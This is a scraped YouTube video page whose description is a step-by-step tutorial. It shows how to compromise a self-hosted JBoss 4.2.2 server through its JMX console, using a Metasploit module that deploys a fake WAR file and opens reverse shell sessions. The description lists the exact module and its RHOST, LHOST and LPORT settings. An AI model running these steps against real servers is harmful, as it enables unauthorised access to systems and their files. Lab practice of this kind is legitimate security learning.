how to hack jboss server using jmx

Loading...

Sign in or sign up now!
Alert icon
Upgrade to the latest Flash Player for improved playback performance. Upgrade now or more info.
1,800
Loading...
Alert icon
Sign in or sign up now!
Alert icon

Uploaded by on Aug 11, 2011

Hi everybody!

Today i'll show you how to use metasploit against JBoss application server.
In this tutorial i'll payload fake war file using JMX console in JBoss and will gain an access to the file system of the server.

This tutorial contains the following softwares:

1. JBoss_4_2_2_GA -- can be download free from JBoss site.
2. Metasploit 5 using jboss_deploymentfilerepository.


Steps for JBoss:

1. Download JBoss_4_2_2_GA.zip for that tutorial, (you can use any other JBoss version).
2. unzip jboss-4.2.2.GA.zip
3. ./run.sh (if you want to supply different ip then 127.0.0.1 so use ./run.sh -b [JBoss's ip])

Steps for :) Metasploit:

1. Search jboss
2. use exploit/multi/http/jboss_deploymentfilerepository
3. show options
4. set RHOST [JBoss's ip]
5. set LHOST [machine's ip]
6. set LPORT 8888 [Any other port]
7. exploit -- before exploit let's see the jmx-console on the browser....

We now see that 4 (actually 5 :)) sessions have been opened in our target....
We can also go to the jboss directory and see the upload....(in tmp folder beacuse we alredy deleted it from the deploy )

Enjoy ;-)...

The fisherman...

Category:

Education

Tags:

License:

Standard YouTube License

  • likes, 2 dislikes

Link to this comment:

Share to:
see all

All Comments (0)

Sign In or Sign Up now to post a comment!
Loading...

Alert icon
0 / 00Unsaved Playlist Return to active list
    1. Your queue is empty. Add videos to your queue using this button:
      or sign in to load a different list.
    Loading...Loading...Saving...
    • Clear all videos from this list
    • Learn more